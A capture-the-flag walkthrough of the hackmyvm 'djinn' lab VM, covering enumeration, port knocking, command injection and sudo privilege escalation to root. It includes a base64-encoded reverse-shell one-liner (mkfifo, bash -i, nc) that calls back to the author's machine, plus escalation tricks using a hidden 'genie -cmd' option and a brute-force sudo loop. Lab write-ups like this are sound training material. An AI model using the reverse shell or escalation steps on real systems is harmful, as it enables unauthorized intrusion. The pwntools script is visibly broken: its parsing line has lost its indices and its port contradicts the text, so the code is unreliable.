The free CTF Challenge web site “hackmyvm.eu” have another easy level vm called ‘djinn‘ for us to download, enumerate and get some flags. In this write-up will try to describe my method and thought process on how I completed this hackmyvm djinn CTF challenge.
This well put together room has a few tricks up it’s sleeves and will confuse the best of us. Although marked easy, I didn’t find it so. There are a few ways to beat this room but I’ll not put the unintended ones here. If you found one, then great. As I am about learning and the sharing of CTF knowledge, I will do it the intended way (I think).
Table of Contents
- Set Up
- Wrap Up
Setup for hackmyvm djinn
The vm can be downloaded from hackmyvm.eu as an OVA file and imported into Oracle VirtualBox.
- 192.168.186.150 – This is my BlackArch enumeration system.
- 192.168.186.19 – This is the djinn vm.
For enumeration of the hackmyvm djinn Challenge I will be using my BackArch system build that I created in a previous blog post. You can use any Kali, BlackArch, Parrot or just standard Linux to proceed.
The first command to run is nmap for network services enumeration.
nmap -F 192.168.186.19
So ftp is open. This can be accessed with anonymous ftp with no password
Seems there are some files to download. They can be all grabbed with the “get” command.
Now we have the files all locally you can take a look at them. I did and the only one I am interested in for now is the one called game.txt. Lets take a look at it.
Time to Play a Game
Taking a look at the port in question we can see there is indeed a game to be played.
nc 192.168.186.19 1227
So we have to answer the question 1000 times to get something useful.
This sounds like trouble. Fortunately we can automate the whole lot with Python and pwntools. Take a look at the code below. As this is not a Python Tutorial I wont go into any detail of the code. But I do have a another post with some details of the tubes in pwntools.
import pwn server = '192.168.186.19' port = '1337' c = pwn.remote(server,port) c.recvuntil('gift.\n') count=0 while count < 1001: count += 1 data = c.recvuntil(b")").decode() c.recv() num1, num2, todo = int(data), int(data), data if todo == "+": answer= num1 + num2 elif todo == '-': answer= num1 - num2 elif todo == '*': answer= num1 * num2 elif todo == '/': answer= num1 / num2 c.send((str(answer) + "\n\r").encode()) print(answer, count) print(c.recv().decode())
This will put a lot of text to the screen but at the end you will see the below…
These are ports for port knocking, they have to be knocked in a sequence to open up another port. Which I happen to know is port 22 for ssh.
Run the below command a few times until port 22 is open.
nmap -p 1356,6784,3409,22 192.168.186.19
So we have opened ssh but we have no username or password so on with the enumeration.
Back to NMap
Lets run a full nmap scan,
nmap -p- 192.168.186.19
This returns a extra port we did not see before,
Run nmap service detection to find out more.
nmap -sV -p 7331 192.168.186.19
A Web Server?
Nothing of interest there!
Lets run gobuster against it.
gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.186.19:7331
All is not what it seems here. It doesn’t like spaces or full stops or slashes so its not much good. Or is it? But we can put in base64 and get a reverse shell. But first have nc running in a window.
nc -vlnp 1234
The code below is including my ip address so you will have to re encode it with your ip address.
echo ` echo "cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxiYXNoIC1pIDI+JjF8bmMgMTkyLjE2OC4xODYuMTUwIDEyMzQgPi90bXAvZg==" | base64 -d ` | sh -
And you should get a reverse shell!
Now we have a shell you can browse the system looking for the good stuff. In /home/nitish/.dev/creds.txt you can find the login details for a user called “nitish”.
As there is a ssh port open we can just ssh with this user.
Once logged in you will find the user flag in the user “nitish” home directory and there are some sudo commands available.
So what is this genie, well its a pain and doesn’t give you the wished you asked for. After a lot of messing about with it I found the following.
- The help (-h) shows some options but one (-cmd) is missing.
- You can find it if you run the strings command against the binary.
strings /usr/bin/genie |egrep "^-"
Run the genie command as the user sam.
sudo -u sam /usr/bin/genie b -cmd
Now you are the user “sam”
The user sam also has a a sudo option.
So this “/root/lago” is a script with some options. But option 2 is a puzzle and if we get it right we get a prize.
The prize here is a root shell. I used the below loop an kept hitting “2” and then “Enter” until it was finally right. Took about 50 goes but I just kept hitting “2” and “Enter” as fast as I could. Took about 60 seconds in total.
Run the below command as the user “sam” and then hit the keyboard as fast as you can.
while true;do sudo /root/lago; done
There is a Root flag is in /root for you to submit.
I hope you got some value and knowledge. IF you are not familiar with pwntools then I would encourage you to work on learning about the tubes in pwntools as it can be valuable for automating CTFs. And who doesn’t love python!
Be First to Comment